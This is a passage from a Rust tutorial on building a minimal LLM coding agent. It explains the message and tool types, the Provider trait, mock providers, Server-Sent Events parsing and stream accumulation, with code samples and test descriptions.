1.2 AssistantTurn
The assistant's response is captured in an AssistantTurn struct:
```rust
pub struct AssistantTurn {
    pub text: Option<String>,
    pub tool_calls: Vec<ToolCall>,
    pub stop_reason: StopReason,
    pub usage: Option<TokenUsage>,
}
```
The model can return text, tool calls, or both. text is Option<String> because when the model decides to use a tool, it may produce no human-readable text at all -- it just emits one or more ToolCall entries. The stop_reason tells the agent loop whether to execute tools and continue, or to present the response to the user and stop.
The usage field is Option<TokenUsage> because we attach token counts at parse time from the API response. Mock providers in tests may leave it as None.
1.3 StopReason
```rust
pub enum StopReason {
    /// The model finished — check `text` for the response.
    Stop,
    /// The model wants to use tools — check `tool_calls`.
    ToolUse,
}
```
This tiny enum drives the entire agent loop. When the provider parses the LLM response:
- `Stop` means the model is done -- its `text` field contains the final answer for the user.
- `ToolUse` means the model wants to invoke tools -- the agent should look at `tool_calls`, execute them, append the results, and call the provider again.
The agent loop uses match on stop_reason to decide whether to break or continue.
1.4 ToolCall
```rust
pub struct ToolCall {
    pub id: String,
    pub name: String,
    pub arguments: Value,
}
```
When the LLM responds with StopReason::ToolUse, it includes one or more ToolCall entries. Each has:
- `id` -- a unique identifier assigned by the API (e.g., `"call_abc123"`). This is the `id` that the matching `Message::ToolResult` echoes back.
- `name` -- which tool to invoke (e.g., `"bash"`, `"read"`, `"edit"`).
- `arguments` -- a JSON object whose shape matches the tool's parameter schema.
The agent loop uses name to look up the tool in the ToolSet, passes arguments to tool.call(), and wraps the output in a Message::ToolResult whose id matches the ToolCall's id.
1.5 ToolDefinition and the builder pattern
Rust concept: the builder pattern
The ToolDefinition uses the builder pattern -- a common Rust idiom where
methods take self by value and return Self, enabling method chaining like
.param(...).param(...). Each call consumes the struct and returns a modified
version. This works because Rust's move semantics mean there is no overhead --
no cloning, no reference counting. The compiler optimizes the chain into a
series of in-place mutations. You will see this pattern throughout the codebase:
ToolSet::new().with(tool1).with(tool2), SimpleAgent::new(provider).tool(bash).
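A dependency-free miniature of the idiom -- each method takes `self` by value and returns `Self`, so calls chain (the real `ToolDefinition` stores a `serde_json::Value` schema rather than a `Vec`):

```rust
// A miniature self-by-value builder: param() consumes the struct,
// mutates it, and hands it back for the next call in the chain.
#[derive(Debug)]
struct Def {
    name: &'static str,
    required: Vec<String>,
}

impl Def {
    fn new(name: &'static str) -> Self {
        Self { name, required: Vec::new() }
    }

    fn param(mut self, name: &str, required: bool) -> Self {
        if required {
            self.required.push(name.to_string());
        }
        self // returning Self is what makes `.param(...).param(...)` work
    }
}

fn main() {
    let def = Def::new("read")
        .param("path", true)
        .param("offset", false);
    assert_eq!(def.name, "read");
    assert_eq!(def.required, vec!["path".to_string()]);
}
```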
Every tool must describe itself to the LLM with a JSON Schema so the model knows what parameters are available. ToolDefinition holds this schema and provides a builder API for constructing it without hand-writing JSON:
```rust
pub struct ToolDefinition {
    pub name: &'static str,
    pub description: &'static str,
    pub parameters: Value,
}
```
The constructor initializes an empty object schema:
```rust
impl ToolDefinition {
    pub fn new(name: &'static str, description: &'static str) -> Self {
        Self {
            name,
            description,
            parameters: serde_json::json!({
                "type": "object",
                "properties": {},
                "required": []
            }),
        }
    }
}
```
.param() -- add a simple parameter
```rust
pub fn param(
    mut self,
    name: &str,
    type_: &str,
    description: &str,
    required: bool,
) -> Self {
    self.parameters["properties"][name] = serde_json::json!({
        "type": type_,
        "description": description
    });
    if required {
        self.parameters["required"]
            .as_array_mut()
            .unwrap()
            .push(Value::String(name.to_string()));
    }
    self
}
```
This is the workhorse. Most tool parameters are simple types -- a "string" for a file path, a "number" for a line offset. The builder takes self by value and returns it, enabling chained calls:
```rust
ToolDefinition::new("read", "Read a file from disk")
    .param("path", "string", "Absolute path to the file", true)
    .param("offset", "number", "Line number to start reading from", false)
    .param("limit", "number", "Maximum number of lines to read", false)
```
`.param_raw()` -- add a complex parameter
```rust
pub fn param_raw(
    mut self,
    name: &str,
    schema: Value,
    required: bool,
) -> Self {
    self.parameters["properties"][name] = schema;
    if required {
        self.parameters["required"]
            .as_array_mut()
            .unwrap()
            .push(Value::String(name.to_string()));
    }
    self
}
```
Some parameters need richer schemas -- enums, arrays, nested objects. param_raw lets you pass an arbitrary serde_json::Value as the schema. For example, an edit tool might define:
```rust
.param_raw("changes", serde_json::json!({
    "type": "array",
    "items": {
        "type": "object",
        "properties": {
            "old_string": { "type": "string" },
            "new_string": { "type": "string" }
        }
    }
}), true)
```
Implement ToolDefinition in src/types.rs. There are no dedicated
unit tests for the builder itself in the starter -- its correctness is
exercised indirectly by every tool's _definition test (for example
test_read_read_definition in tests/read.rs). Making cargo build -p mini-claw-code-starter
succeed is the practical check here.
1.6 The Tool trait
This is the central abstraction. Every tool -- Bash, Read, Write, Edit -- implements this trait:
```rust
#[async_trait::async_trait]
pub trait Tool: Send + Sync {
    fn definition(&self) -> &ToolDefinition;
    async fn call(&self, args: Value) -> anyhow::Result<String>;
}
```
Just two required methods -- this is deliberately minimal:
definition() returns the tool's schema. This is called once when registering tools and whenever the agent needs to send tool definitions to the LLM. It returns a reference (&ToolDefinition) because the definition is static for the lifetime of the tool.
call() is the execution entry point. It receives the JSON arguments the LLM provided and returns a String result (or an error). This is async because most tools do I/O -- reading files, running subprocesses, making HTTP requests.
Note that call() returns anyhow::Result<String> -- not a ToolResult struct. The starter simplifies tool output to plain strings. If a tool fails, you can return Ok(format!("error: {e}")) to let the model see the error and recover, or return Err(e) for unrecoverable situations.
The trait uses #[async_trait] and is marked Send + Sync so tools can be stored as Box<dyn Tool> in the ToolSet and called from async contexts. For why Tool uses #[async_trait] while Provider uses RPITIT, see Why two async trait styles?.
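The recoverable-vs-unrecoverable distinction above is easy to get backwards, so here is a minimal sketch of the convention using plain `Result<String, String>` in place of `anyhow::Result<String>` (the helper name `read_file_tool` and its error policy are illustrative, not the starter's):

```rust
// Sketch of the error-handling convention: recoverable failures become
// Ok-wrapped text the model can read and react to; only a malformed call
// itself returns Err.
fn read_file_tool(path: &str) -> Result<String, String> {
    if path.is_empty() {
        // Unrecoverable here: the call is malformed.
        return Err("missing required parameter 'path'".to_string());
    }
    match std::fs::read_to_string(path) {
        Ok(contents) => Ok(contents),
        // Recoverable: let the model see the error and try another path.
        Err(e) => Ok(format!("error: {e}")),
    }
}
```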
1.7 ToolSet
The agent needs to look up tools by name when the LLM requests a tool call. ToolSet is a HashMap-backed registry:
```rust
pub struct ToolSet {
    tools: HashMap<String, Box<dyn Tool>>,
}
```
The key methods:
```rust
impl ToolSet {
    pub fn new() -> Self {
        Self { tools: HashMap::new() }
    }

    /// Builder-style: add a tool and return self.
    pub fn with(mut self, tool: impl Tool + 'static) -> Self {
        self.push(tool);
        self
    }

    /// Add a tool, keyed by its definition name.
    pub fn push(&mut self, tool: impl Tool + 'static) {
        let name = tool.definition().name.to_string();
        self.tools.insert(name, Box::new(tool));
    }

    /// Look up a tool by name.
    pub fn get(&self, name: &str) -> Option<&dyn Tool> {
        self.tools.get(name).map(|t| t.as_ref())
    }

    /// Collect all tool schemas for the provider.
    pub fn definitions(&self) -> Vec<&ToolDefinition> {
        self.tools.values().map(|t| t.definition()).collect()
    }
}

impl Default for ToolSet {
    fn default() -> Self {
        Self::new()
    }
}
```
A few design points:
- `with()` enables builder-style chaining: `ToolSet::new().with(ReadTool::new()).with(BashTool::new())`.
- `push()` extracts the name from the tool's definition, so you never pass the name manually -- one source of truth.
- `definitions()` collects all schemas into a `Vec` that the provider sends to the LLM at the start of each turn.
- `Box<dyn Tool>` is the trait object that makes heterogeneous storage possible. The `'static` bound on `push`/`with` ensures the tool lives long enough.
ToolSet has no dedicated test of its own in the starter -- it is exercised
by the test_single_turn_* suite (Chapter 3) and test_multi_tool_* suite
(Chapter 12), both of which construct real ToolSets and assert their
definitions are rendered correctly.
1.8 TokenUsage
LLM APIs report token counts with each response. Tracking these is useful for cost awareness and debugging.
```rust
#[derive(Debug, Clone, Default)]
pub struct TokenUsage {
    pub input_tokens: u64,
    pub output_tokens: u64,
}
```
The starter uses a simplified TokenUsage with just input and output token counts. It is stored as Option<TokenUsage> in AssistantTurn -- mock providers in tests set it to None, while the real OpenRouterProvider populates it from the API response.
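A hypothetical accumulation helper (not in the starter) shows why `Default` and `Option<TokenUsage>` compose nicely: turns from mock providers carry `None` and simply contribute nothing to the total.

```rust
#[derive(Debug, Clone, Default, PartialEq)]
struct TokenUsage {
    input_tokens: u64,
    output_tokens: u64,
}

// Illustrative helper: fold per-turn usage into a running total, treating
// None (e.g. from a MockProvider) as zero.
fn accumulate(total: &mut TokenUsage, turn_usage: Option<&TokenUsage>) {
    if let Some(u) = turn_usage {
        total.input_tokens += u.input_tokens;
        total.output_tokens += u.output_tokens;
    }
}
```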
The Default impl is covered by test_cost_tracker_token_usage_default in
tests/cost_tracker.rs (used again in Chapter 17). If you want to run it in
isolation:
cargo test -p mini-claw-code-starter test_cost_tracker_token_usage_default
1.9 The Provider trait
The Provider trait is defined in src/types.rs. It abstracts over any LLM backend:
```rust
pub trait Provider: Send + Sync {
    fn chat<'a>(
        &'a self,
        messages: &'a [Message],
        tools: &'a [&'a ToolDefinition],
    ) -> impl Future<Output = anyhow::Result<AssistantTurn>> + Send + 'a;
}
```
Unlike Tool, Provider uses RPITIT (return-position impl Trait in traits) rather than #[async_trait]. The full trade-off is covered in Why two async trait styles?.
A blanket impl lets Arc<P> also be a Provider, which is needed later for sharing a provider between an agent and its subagents:
```rust
impl<P: Provider> Provider for Arc<P> { /* ... */ }
```
We implement the MockProvider in Chapter 5a and the OpenRouterProvider in Chapter 5b.
Putting it all together
After implementing src/types.rs, run the full chapter test suite:
cargo test -p mini-claw-code-starter test_mock_
What the tests verify
- `test_mock_message_user` -- constructs a `Message::User` and verifies it holds the expected string
- `test_mock_message_system` -- constructs a `Message::System` and verifies it holds the expected string
- `test_mock_message_tool_result` -- constructs a `Message::ToolResult` and verifies both `id` and `content` are correct
- `test_mock_assistant_turn` -- builds an `AssistantTurn` with text and verifies `stop_reason` is `Stop`
- `test_mock_tool_definition_builder` -- uses the builder to add parameters and verifies the resulting JSON schema has the correct structure
- `test_mock_tool_definition_optional_param` -- adds an optional parameter and verifies it does not appear in the `required` array
- `test_mock_toolset_empty` -- creates an empty `ToolSet` and verifies `get()` returns `None` for any name
- `test_mock_token_usage_default` -- verifies that `TokenUsage::default()` initializes both counters to zero
What you built
This chapter established the type vocabulary for the entire agent:
- `Message` -- a four-variant enum carrying every kind of conversation entry: system instructions, user input, assistant responses, and tool results.
- `AssistantTurn` -- the model's response, containing optional text, tool calls, a stop reason, and optional token usage.
- `StopReason` -- the binary signal that drives the agent loop: keep going or stop.
- `ToolDefinition` -- a builder for JSON Schema tool descriptions that the LLM uses to understand what tools are available.
- `ToolCall` -- the request side of tool execution, linked by ID to `Message::ToolResult`.
- `Tool` trait -- the minimal async interface every tool must implement: `definition()` and `call()`.
- `ToolSet` -- a `HashMap`-backed registry for looking up tools by name at runtime.
- `Provider` trait -- the async LLM abstraction, generic over any backend.
- `TokenUsage` -- per-request token tracking.
Key takeaway
The entire agent -- tools, providers, the loop itself -- is built on the vocabulary defined in this chapter. Getting these types right (especially the Message enum and StopReason) determines whether the agent loop is simple or tangled. The types are the contract; everything else is implementation.
None of these types do anything on their own -- they are the nouns of the system. In the next chapter, we will implement the MockProvider and OpenRouterProvider, giving these types their first verbs.
Check yourself
← Chapter 3: The Agentic Loop · Contents · Chapter 5a: Provider & Streaming Foundations →
Chapter 5a: Provider & Streaming Foundations
File(s) to edit:
- `src/streaming.rs` -- every stub tagged `TODO ch5a:` (everything except `StreamingAgent`, which is Ch5b's).
- `src/mock.rs` already carries the `MockProvider` stubs you filled in Chapter 1; this chapter leans on that work but does not re-fill it. If you skipped ahead from Ch1, go back and finish the `TODO ch1:` stubs first.

Tests to run: `cargo test -p mini-claw-code-starter test_mock_` and `cargo test -p mini-claw-code-starter test_streaming_parse_ test_streaming_accumulator_`

Estimated time: 35 min
Goal
- Revisit `MockProvider` (built in Ch1) as the canonical example of the `Provider` trait, and use it to motivate the streaming siblings below.
- Implement `parse_sse_line` so we can turn a single SSE line into `StreamEvent`s.
- Implement `StreamAccumulator` so a stream of deltas reassembles into a complete `AssistantTurn`.
- Implement `MockStreamProvider` so UI-facing code can be tested without a real HTTP connection.
- Understand when to reach for `std::sync::Mutex` vs `tokio::sync::Mutex` in async code.
Chapter 4 defined the data that flows through the agent. This chapter (and the next) turns those types into something that can actually produce that data: an LLM backend. We split the work into two halves:
- Ch5a (this chapter): the abstractions and testable foundations -- traits, mock providers, SSE parsing, stream accumulation.
- Ch5b: the real HTTP provider (`OpenRouterProvider`) and the `StreamingAgent` that wires a stream channel through the agent loop.
Keeping streaming plumbing (this chapter) separate from networking and orchestration (next chapter) makes each part testable in isolation.
How streaming works end-to-end
For orientation, here is what the finished system looks like. Don't worry about the StreamingAgent and OpenRouter API boxes yet — those belong to 5b. This chapter builds every other box.
```mermaid
sequenceDiagram
    participant Agent
    participant StreamProvider
    participant API as LLM API
    participant Channel as mpsc channel
    participant UI
    Agent->>StreamProvider: stream_chat(messages, tools, tx)
    StreamProvider->>API: POST /chat/completions (stream: true)
    loop SSE chunks
        API-->>StreamProvider: data: {"delta": ...}
        StreamProvider->>StreamProvider: parse_sse_line
        StreamProvider->>Channel: send(StreamEvent)
        StreamProvider->>StreamProvider: accumulator.feed(event)
        Channel-->>UI: recv() and render
    end
    API-->>StreamProvider: data: [DONE]
    StreamProvider->>Agent: return accumulator.finish()
```
Why a trait?
A coding agent needs to call an LLM, but which LLM should not be hard-coded. During tests we want instant, deterministic responses. In production we want streaming over HTTP. The Provider trait gives us that seam.
Claude Code uses a similar abstraction internally — every LLM call goes through a provider interface, and the choice of backend (Anthropic API, Bedrock, Vertex) is resolved at startup.
The Provider trait (RPITIT)
Here is the full trait:
```rust
pub trait Provider: Send + Sync {
    fn chat<'a>(
        &'a self,
        messages: &'a [Message],
        tools: &'a [&'a ToolDefinition],
    ) -> impl Future<Output = anyhow::Result<AssistantTurn>> + Send + 'a;
}
```
A few things to notice:
No #[async_trait]. The Provider trait uses return-position impl Trait in traits (RPITIT) — stabilized in Rust 1.75. Writing fn chat(...) -> impl Future<...> instead of async fn chat(...) gives us explicit control over the lifetime and Send bound; async fn in a trait does not always infer Send for the returned future, which would prevent spawning onto a multi-threaded runtime. The explicit impl Future<...> + Send + 'a signature solves that, and it avoids the heap allocation that #[async_trait] would require.
The Tool trait in Chapter 6 uses #[async_trait] for the opposite reason — object safety for heterogeneous storage. For the full explanation of when to pick which style, see Why two async trait styles?. The one-liner version is also in Chapter 2.
Why Send + Sync on the trait itself? Our agent loop will hold a P: Provider behind a shared reference (and later behind Arc). The Sync bound lets multiple tasks share the provider, and Send lets it cross thread boundaries.
Lifetime 'a everywhere. The returned future borrows both &self and the input slices. Tying them to a single lifetime 'a tells the compiler the future lives no longer than those borrows, avoiding 'static requirements.
The Provider trait is already defined in src/types.rs (Chapter 4). The starter puts it alongside the message types because everything lives in a flat layout.
The Arc<P> blanket impl
Directly below the Provider trait, the starter has:
```rust
impl<P: Provider> Provider for Arc<P> {
    fn chat<'a>(
        &'a self,
        messages: &'a [Message],
        tools: &'a [&'a ToolDefinition],
    ) -> impl Future<Output = anyhow::Result<AssistantTurn>> + Send + 'a {
        (**self).chat(messages, tools)
    }
}
```
This says: "if P is a Provider, then Arc<P> is also a Provider." It just dereferences through the Arc and delegates to the inner value.
Why does this matter? Later, when we build subagents, the main agent and its subagents will share the same provider. Cloning an Arc is cheap, and the blanket impl means subagent code that is generic over P: Provider works identically whether it receives a bare provider or a shared one. Without this impl, you would need separate type plumbing to pass shared providers around.
Both the Provider trait and the Arc<P> blanket impl are already in src/types.rs.
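The same blanket-impl pattern can be reproduced in miniature with a synchronous trait. All names here are illustrative, not from the starter -- the point is the shape: delegate through `Arc`, and generic code stops caring whether the value is shared.

```rust
use std::sync::Arc;

trait Speak {
    fn speak(&self) -> String;
}

struct Dog;
impl Speak for Dog {
    fn speak(&self) -> String {
        "woof".to_string()
    }
}

// Blanket impl: if P implements Speak, Arc<P> does too, by delegation --
// the same shape as the Arc<P> Provider impl above.
impl<P: Speak> Speak for Arc<P> {
    fn speak(&self) -> String {
        (**self).speak()
    }
}

// Generic code works identically with bare or shared values.
fn announce<S: Speak>(s: &S) -> String {
    format!("says: {}", s.speak())
}
```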
MockProvider
Testing an agent against a live API is slow, expensive, and nondeterministic. The MockProvider lets you script exact responses and verify that your agent handles them correctly.
```rust
use std::collections::VecDeque;
use std::sync::Mutex;

pub struct MockProvider {
    responses: Mutex<VecDeque<AssistantTurn>>,
}

impl MockProvider {
    pub fn new(responses: VecDeque<AssistantTurn>) -> Self {
        Self { responses: Mutex::new(responses) }
    }
}

impl Provider for MockProvider {
    async fn chat(
        &self,
        _messages: &[Message],
        _tools: &[&ToolDefinition],
    ) -> anyhow::Result<AssistantTurn> {
        self.responses
            .lock()
            .unwrap()
            .pop_front()
            .ok_or_else(|| anyhow::anyhow!("MockProvider: no more responses"))
    }
}
```
Rust concept: std::sync::Mutex vs tokio::sync::Mutex
The Provider trait takes &self (not &mut self), because providers are shared. But we need to mutate the queue. Which Mutex should we use?
The rule of thumb: use std::sync::Mutex when the critical section is trivial (no .await inside the lock), and tokio::sync::Mutex when you need to hold the lock across an .await point. Here the critical section is just a pop_front — a single pointer operation. Using tokio::sync::Mutex would add unnecessary overhead (it is an async-aware lock that yields to the runtime). std::sync::Mutex is cheaper and perfectly safe because the lock is never held long enough to block the runtime.
The design:
- `VecDeque` -- responses are consumed in FIFO order. The first call to `chat` returns the first response, the second call returns the second, and so on.
- `Mutex` -- wraps the queue so `&self` methods can mutate it. See the Rust concept note above for why `std::sync::Mutex` is the right choice here.
- Error on exhaustion -- if the test scripts three responses but the agent calls `chat` a fourth time, it gets an error instead of a silent panic. This catches agent loops that spin more times than expected.
Testing strategy
The MockProvider is the foundation of all our tests. By scripting the exact sequence of responses, you can test:
- Single-turn: one response with `StopReason::Stop`
- Tool use loops: first response has `StopReason::ToolUse` with tool calls, the agent executes them and sends results back, second response has `StopReason::Stop`
- Multi-turn sequences: any number of scripted turns
- Error handling: an empty queue returns an error
A typical test:
```rust
#[tokio::test]
async fn mock_returns_text() {
    let provider = MockProvider::new(VecDeque::from([AssistantTurn {
        text: Some("Hello!".into()),
        tool_calls: vec![],
        stop_reason: StopReason::Stop,
        usage: None,
    }]));
    let turn = provider
        .chat(&[Message::User("Hi".into())], &[])
        .await
        .unwrap();
    assert_eq!(turn.text.as_deref(), Some("Hello!"));
}
```
Notice that the test ignores the messages input — the mock does not look at what the agent sends. This is intentional. You are testing the agent's behavior given a known provider response, not the provider's ability to understand prompts.
Your task
Open src/mock.rs in the starter. You will see the MockProvider struct with unimplemented!() stubs. Fill in new() and the Provider impl.
StreamEvent
Before defining the streaming trait, we need a vocabulary for the incremental chunks an LLM sends back:
```rust
#[derive(Debug, Clone, PartialEq)]
pub enum StreamEvent {
    /// A fragment of the model's text response.
    TextDelta(String),
    /// The beginning of a tool call (carries the call ID and tool name).
    ToolCallStart { index: usize, id: String, name: String },
    /// A fragment of a tool call's JSON arguments.
    ToolCallDelta { index: usize, arguments: String },
    /// The stream is complete.
    Done,
}
```
These four variants map directly to the OpenAI streaming API:
- `TextDelta` -- a fragment of the model's natural-language output (e.g. `"Hello"`, then `" world"`).
- `ToolCallStart` -- the model has begun a tool call. `index` identifies which call (a single turn can request multiple tools), `id` is a server-assigned correlation ID, and `name` is the tool.
- `ToolCallDelta` -- a fragment of the JSON arguments for the call at `index`. Arguments arrive incrementally because the model generates JSON token-by-token.
- `Done` -- end-of-stream signal.
The index field matters because streaming interleaves fragments from multiple tool calls, and consumers need to know which call each fragment belongs to.
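A small sketch of why `index` matters: fragments from two concurrent tool calls arrive interleaved, and the consumer routes each one into the right buffer. The `route` helper below is illustrative, mirroring the padding strategy the accumulator uses.

```rust
// Route interleaved (index, fragment) pairs into per-call buffers.
fn route(fragments: &[(usize, &str)]) -> Vec<String> {
    let mut buffers: Vec<String> = Vec::new();
    for &(index, frag) in fragments {
        // Grow the buffer list on demand.
        while buffers.len() <= index {
            buffers.push(String::new());
        }
        buffers[index].push_str(frag);
    }
    buffers
}
```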
The StreamProvider trait
```rust
pub trait StreamProvider: Send + Sync {
    fn stream_chat<'a>(
        &'a self,
        messages: &'a [Message],
        tools: &'a [&'a ToolDefinition],
        tx: mpsc::UnboundedSender<StreamEvent>,
    ) -> impl Future<Output = anyhow::Result<AssistantTurn>> + Send + 'a;
}
```
The design uses a channel-based streaming model rather than returning an AsyncIterator or Stream. The caller creates a tokio::sync::mpsc::unbounded_channel(), passes the sender half to stream_chat, and reads events from the receiver half — typically in a separate task that renders them to the terminal.
The method itself still returns the fully assembled AssistantTurn when the stream is complete. This means the agent loop always gets a clean AssistantTurn to work with, regardless of whether streaming is enabled. The channel is a side-channel for the UI.
Why UnboundedSender instead of a bounded channel? Streaming events are tiny and arrive at network speed, not faster. Backpressure is unnecessary because the bottleneck is the API, not the consumer. An unbounded channel keeps the API simpler.
The StreamEvent enum and StreamProvider trait both live in src/streaming.rs in the starter.
MockStreamProvider
The MockStreamProvider wraps a MockProvider and synthesizes StreamEvents from each canned response. This lets you test UI code that consumes stream events without needing a real HTTP connection.
The struct wraps a MockProvider and its stream_chat impl works in three steps:
1. Delegate to `self.inner.chat()` to get the canned `AssistantTurn`
2. Decompose it into events: text is sent character-by-character as `TextDelta` events, each tool call emits a `ToolCallStart` + single `ToolCallDelta`, and a final `Done` is sent
3. Return the original `AssistantTurn` unchanged
Here is the full implementation:
```rust
pub struct MockStreamProvider {
    inner: MockProvider,
}

impl MockStreamProvider {
    pub fn new(responses: VecDeque<AssistantTurn>) -> Self {
        Self { inner: MockProvider::new(responses) }
    }
}

impl StreamProvider for MockStreamProvider {
    async fn stream_chat(
        &self,
        messages: &[Message],
        tools: &[&ToolDefinition],
        tx: mpsc::UnboundedSender<StreamEvent>,
    ) -> anyhow::Result<AssistantTurn> {
        let turn = self.inner.chat(messages, tools).await?;

        // Synthesize stream events from the complete turn
        if let Some(ref text) = turn.text {
            for ch in text.chars() {
                let _ = tx.send(StreamEvent::TextDelta(ch.to_string()));
            }
        }
        for (i, call) in turn.tool_calls.iter().enumerate() {
            let _ = tx.send(StreamEvent::ToolCallStart {
                index: i,
                id: call.id.clone(),
                name: call.name.clone(),
            });
            let _ = tx.send(StreamEvent::ToolCallDelta {
                index: i,
                arguments: call.arguments.to_string(),
            });
        }
        let _ = tx.send(StreamEvent::Done);
        Ok(turn)
    }
}
```
This avoids duplicating the response queue logic — the inner.chat() call handles the VecDeque pop. The let _ = tx.send(...) pattern intentionally ignores send errors — if the receiver is dropped, nobody is listening, and that is fine.
Your task
Fill in MockStreamProvider::new() and its stream_chat() stub in src/streaming.rs.
Server-Sent Events and parse_sse_line
When the real provider requests stream: true, the API returns a stream of Server-Sent Events (SSE). SSE is a simple text protocol over HTTP:
```
data: {"choices":[{"delta":{"content":"Hello"},"finish_reason":null}]}

data: {"choices":[{"delta":{"content":" world"},"finish_reason":null}]}

data: [DONE]
```
Each event is a line starting with data: followed by a JSON payload (or the special string [DONE]). Events are separated by blank lines. That is the entire protocol — no framing, no length prefixes, just newline-delimited text. This simplicity is why SSE is the standard for LLM streaming.
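The framing step reduces to a single standard-library call. A quick sketch of the three line shapes, with a hypothetical `payload` helper standing in for the prefix-stripping step:

```rust
// SSE framing in miniature: only `data: ` lines carry payloads;
// everything else (comments, `event:` lines, blanks) is not a data event.
fn payload(line: &str) -> Option<&str> {
    line.strip_prefix("data: ")
}
```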
Our parse_sse_line function handles a single line:
```rust
pub fn parse_sse_line(line: &str) -> Option<Vec<StreamEvent>> {
    let data = line.strip_prefix("data: ")?;
    if data == "[DONE]" {
        return Some(vec![StreamEvent::Done]);
    }
    let chunk: ChunkResponse = serde_json::from_str(data).ok()?;
    let choice = chunk.choices.into_iter().next()?;
    let mut events = Vec::new();

    if let Some(text) = choice.delta.content
        && !text.is_empty()
    {
        events.push(StreamEvent::TextDelta(text));
    }

    if let Some(tool_calls) = choice.delta.tool_calls {
        for tc in tool_calls {
            if let Some(id) = tc.id {
                let name = tc
                    .function
                    .as_ref()
                    .and_then(|f| f.name.clone())
                    .unwrap_or_default();
                events.push(StreamEvent::ToolCallStart { index: tc.index, id, name });
            }
            if let Some(ref func) = tc.function
                && let Some(ref args) = func.arguments
                && !args.is_empty()
            {
                events.push(StreamEvent::ToolCallDelta {
                    index: tc.index,
                    arguments: args.clone(),
                });
            }
        }
    }

    if events.is_empty() { None } else { Some(events) }
}
```
Walk through the logic:
- Strip the `data: ` prefix. Lines that do not start with `data: ` (like `event: ping` or blank lines) return `None` -- they are not data events.
- Check for `[DONE]`. This is the OpenAI-standard end-of-stream sentinel. Return a `Done` event.
- Parse JSON into `ChunkResponse`. If the JSON is malformed, `.ok()?` silently skips it. This is intentional -- SSE streams occasionally include keep-alive pings or malformed chunks, and crashing would be worse than dropping a token.
- Extract text deltas. The `delta.content` field contains the text fragment. Empty strings are skipped.
- Extract tool call events. A single chunk can contain both a `ToolCallStart` (when the `id` field is present, signaling a new call) and a `ToolCallDelta` (when `arguments` is present). The `if let ... && let ...` syntax is Rust's let-chains feature, stabilized in edition 2024.
Rust concept: let-chains
The if let Some(ref func) = tc.function && let Some(ref args) = func.arguments syntax combines two pattern matches into a single if expression. Before let-chains, you would need nested if let blocks or a match with a tuple. Let-chains flatten the nesting and make the condition more readable. The ref keyword borrows the matched value instead of moving it, which is necessary here because tc is used again after the if let.
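For comparison, here is the nested form that a let-chain flattens, as a standalone sketch with an illustrative `Function` type (the chained version is shown in the comment; the nested form compiles on any edition):

```rust
// With let-chains this collapses to:
//   if let Some(func) = function && let Some(args) = &func.arguments && !args.is_empty() { ... }
struct Function {
    arguments: Option<String>,
}

fn first_args(function: &Option<Function>) -> Option<String> {
    if let Some(func) = function {
        if let Some(args) = &func.arguments {
            if !args.is_empty() {
                return Some(args.clone());
            }
        }
    }
    None
}
```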
The tests verify the parser against three cases: a text delta line produces StreamEvent::TextDelta("Hello"), the data: [DONE] line produces StreamEvent::Done, and non-data lines like event: ping or empty strings return None.
Your task
The parse_sse_line function and its SSE deserialization types (ChunkResponse, ChunkChoice, Delta, DeltaToolCall, DeltaFunction) are in src/streaming.rs. Fill in the parse_sse_line stub.
StreamAccumulator
Streaming gives the UI real-time output, but the agent loop needs a complete AssistantTurn to decide what to do next. The StreamAccumulator bridges this gap — it collects events as they arrive and produces a finished message at the end.
```rust
pub struct StreamAccumulator {
    text: String,
    tool_calls: Vec<PartialToolCall>,
}

struct PartialToolCall {
    id: String,
    name: String,
    arguments: String,
}
```
The two key methods:
```rust
impl StreamAccumulator {
    pub fn new() -> Self {
        Self { text: String::new(), tool_calls: Vec::new() }
    }

    pub fn feed(&mut self, event: &StreamEvent) {
        match event {
            StreamEvent::TextDelta(s) => self.text.push_str(s),
            StreamEvent::ToolCallStart { index, id, name } => {
                // Ensure the Vec is large enough for this index
                while self.tool_calls.len() <= *index {
                    self.tool_calls.push(PartialToolCall {
                        id: String::new(),
                        name: String::new(),
                        arguments: String::new(),
                    });
                }
                self.tool_calls[*index].id = id.clone();
                self.tool_calls[*index].name = name.clone();
            }
            StreamEvent::ToolCallDelta { index, arguments } => {
                if let Some(tc) = self.tool_calls.get_mut(*index) {
                    tc.arguments.push_str(arguments);
                }
            }
            StreamEvent::Done => {}
        }
    }

    pub fn finish(self) -> AssistantTurn {
        let text = if self.text.is_empty() { None } else { Some(self.text) };
        let tool_calls: Vec<ToolCall> = self
            .tool_calls
            .into_iter()
            .filter(|tc| !tc.name.is_empty())
            .map(|tc| ToolCall {
                id: tc.id,
                name: tc.name,
                arguments: serde_json::from_str(&tc.arguments).unwrap_or(Value::Null),
            })
            .collect();
        let stop_reason = if tool_calls.is_empty() {
            StopReason::Stop
        } else {
            StopReason::ToolUse
        };
        AssistantTurn { text, tool_calls, stop_reason, usage: None }
    }
}
```
Design notes:
- `feed` appends incrementally. Text fragments concatenate into `self.text`. Tool call arguments concatenate per-index into `PartialToolCall::arguments`.
- Sparse index handling. The `while` loop in `ToolCallStart` pads the vector with empty entries so that `index: 2` works even if the vector only has one element. The `filter(|tc| !tc.name.is_empty())` in `finish` strips those placeholders.
- Deferred JSON parsing. Arguments arrive as string fragments during streaming. `finish` parses the concatenated string into `serde_json::Value` only after the stream ends, falling back to `Value::Null` on malformed JSON.
- `stop_reason` is derived from the tool calls. If any survived the filter, it is `ToolUse`; otherwise `Stop`. Usage is `None` because most streaming APIs do not include token counts per chunk.
The accumulator tests (test_streaming_accumulator_text, test_streaming_accumulator_tool_call) feed two text deltas or a tool-call-start plus two argument fragments and verify that the concatenated result is what you'd expect.
Your task
The StreamAccumulator and PartialToolCall are in src/streaming.rs. Fill in the new(), feed(), and finish() stubs.
Run the tests
```
cargo test -p mini-claw-code-starter test_mock_
cargo test -p mini-claw-code-starter test_streaming_parse_
cargo test -p mini-claw-code-starter test_streaming_accumulator_
```
What these tests verify
test_mock_ (MockProvider):
- `test_mock_mock_returns_text` -- scripts a single text response and verifies `chat()` returns it
- `test_mock_mock_exhausted` -- calls `chat()` on an empty queue and verifies it returns an error
test_streaming_parse_ (SSE parser):
- `test_streaming_parse_text_delta` -- feeds a `data:` line with text content and verifies a `TextDelta` event is produced
- `test_streaming_parse_done` -- feeds `data: [DONE]` and verifies a `Done` event is produced
- `test_streaming_parse_non_data_lines` -- feeds a non-data line like `event: ping` and verifies `None` is returned
test_streaming_accumulator_ (stream reassembly):
- `test_streaming_accumulator_text` -- feeds two `TextDelta` events and verifies the concatenated result
